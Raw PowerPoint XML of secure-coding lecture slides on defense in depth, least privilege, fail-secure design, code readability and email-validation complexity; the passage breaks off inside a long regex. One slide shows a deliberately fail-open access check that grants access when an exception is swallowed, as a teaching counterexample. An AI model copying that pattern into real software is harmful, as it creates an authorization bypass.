              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err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GB" sz="2000" b="1" i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i="1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making sure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" i="1" dirty="0" err="1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i="1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is not 0 == root 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== 0) {  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" i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1;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setuid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08615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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131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" name="Picture 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925" y="1050925"/>
            <a:ext cx="7751763" cy="5330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 bwMode="auto">
          <a:xfrm rot="342016">
            <a:off x="230188" y="2857500"/>
            <a:ext cx="3055937" cy="1404938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Situations that can turn very wrong very quickly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563" name="Picture 3" descr="fortress-beaumar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8" y="1052513"/>
            <a:ext cx="55372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372225" y="981075"/>
            <a:ext cx="16906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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XIII century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27658" name="Picture 10" descr="E:\Local\2010.06 Sec Day\securing\img\Defense in depth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3213" y="2708275"/>
            <a:ext cx="4922837" cy="36544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308850" y="2276475"/>
            <a:ext cx="17208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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXI century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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layers of defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean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Complexity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50179" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="981075"/>
            <a:ext cx="7777163" cy="5256213"/>
            <a:chOff x="113" y="618"/>
            <a:chExt cx="4899" cy="3311"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50180" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="907" y="-176"/>
              <a:ext cx="3311" cy="4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/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>System calls in Apache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50181" name="Picture 5" descr="SysCallApach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694"/>
              <a:ext cx="4490" cy="3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Complexity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51203" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="981075"/>
            <a:ext cx="7777163" cy="5256213"/>
            <a:chOff x="113" y="618"/>
            <a:chExt cx="4899" cy="3311"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51204" name="Rectangle 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="907" y="-176"/>
              <a:ext cx="3311" cy="4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/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>System calls in IIS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51205" name="Picture 4" descr="SysCallII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689"/>
              <a:ext cx="4490" cy="3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– (some) golden rules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Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security-sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>parts of your code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>small</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/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Least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>program should run on the least privileged account possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>same for accessing databases, files etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>revoke a privilege when it is not needed anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe defaults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Deny by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resource consumption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Fail gracefully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Question again your assumptions, decisions etc.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Deny by default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isAllowed(user):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allowed = true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(!listedInFile(user, "admins.xml")):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IOError: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 pass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allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="180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isAllowed(user):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(listedInFile(user, "admins.xml")): allowed = true</a:t>
            </a:r>
          </a:p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	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 pass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allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="180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5750" y="3571875"/>
            <a:ext cx="85725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ular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215063" y="2500313"/>
            <a:ext cx="2214562" cy="928687"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -218108"/>
              <a:gd name="adj2" fmla="val 9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What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is thrown instead? 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4000500" y="1500188"/>
            <a:ext cx="1143000" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -175276"/>
              <a:gd name="adj2" fmla="val -24166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indent="-266700" algn="ctr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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No!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4214813" y="4143375"/>
            <a:ext cx="1143000" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -175276"/>
              <a:gd name="adj2" fmla="val -24166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indent="-266700" algn="ctr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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49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Ross Anderson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 smtClean="0"/>
              <a:t>Security Engineering: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	A Guide to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	Building Dependable </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>	Distributed Systems</a:t>
            </a:r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sz="2000" dirty="0" smtClean="0"/>
              <a:t>(the book is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>freely available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cl.cam.ac.uk/~rja14/book.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 5" descr="C:\Sebastian\ComputerSecurity\my presentations\2008.05 - Computing Seminar\materials\book2cover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9375" y="1928813"/>
            <a:ext cx="2127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33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Implementation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1043608" y="2386488"/>
            <a:ext cx="7085905" cy="3130744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@P=split//,".URRUU\c8R";@d=split//,"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nrekcah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xinU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lreP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rehtona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tsuJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";sub p{@p{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"}=(P,P);pipe"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u$p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";++$p;($q*=2)+=$f=!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fork;map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{$P=$P[$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f|ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>($p{$_})&amp;6];$p{$_}=/^$P/ix?$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P:close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys%p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p;p;p;p;p;map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{$p{$_}=~/^[P.]/&amp;&amp; close$_}%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p;wait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> until$?; map{ /^r/&amp;&amp;&lt;$_&gt;}%p;$_=$d[$q];sleep rand(2) if/\S/;print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this code? What does it do? Is it secure?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Would you like to maintain it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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041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Bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> appear in code, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>to err is human</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some bugs can become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers might discover an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What to do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read and follow guidelines for your programming language and software type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Think of security implications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reuse trusted code (libraries, modules etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write good-quality, readable and maintainable code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(bad code won’t ever be secure)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Validating an e-mail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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validating an e-mail address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>should be easy, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Not really: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> from Mail::RFC822::Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0"/>
              <a:t>(?:(?:\r\n)?[ \t])*(?:(?:(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t] )+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?: \r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:( ?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*))*@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\0 31]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\ ](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+ (?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?: (?:\r\n)?[ \t])*))*|(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z |(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n) ?[ \t])*)*\&lt;(?:(?:\r\n)?[ \t])*(?:@(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\ r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n) ?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t] )*))*(?:,@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])* )(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t] )+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*) *:(?:(?:\r\n)?[ \t])*)?(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+ |\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r \n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?: \r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t ]))*"(?:(?:\r\n)?[ \t])*))*@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031 ]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\]( ?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(? :(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(? :\r\n)?[ \t])*))*\&gt;(?:(?:\r\n)?[ \t])*)|(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(? :(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)? [ \t]))*"(?:(?:\r\n)?[ \t])*)*:(?:(?:\r\n)?[ \t])*(?:(?:(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]| \\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt; @,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|" (?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*))*@(?:(?:\r\n)?[ \t] )*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\ ".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(? :[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[ \]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*|(?:[^()&lt;&gt;@,;:\\".\[\] \000- \031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|( ?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)*\&lt;(?:(?:\r\n)?[ \t])*(?:@(?:[^()&lt;&gt;@,; :\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([ ^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\" .\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\ ]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*(?:,@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\ [\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\ r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\] |\\.)*\](?:(?:\r\n)?[ \t])*))*)*:(?:(?:\r\n)?[ \t])*)?(?:[^()&lt;&gt;@,;:\\".\[\] \0 00-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\ .|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@, ;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|"(? :[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*))*@(?:(?:\r\n)?[ \t])* (?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\". \[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[ ^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\] ]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*\&gt;(?:(?:\r\n)?[ \t])*)(?:,\s*( ?:(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\ ".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)(?:\.(?:( ?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[ \["()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t ])*))*@(?:(?:\r\n)?[ 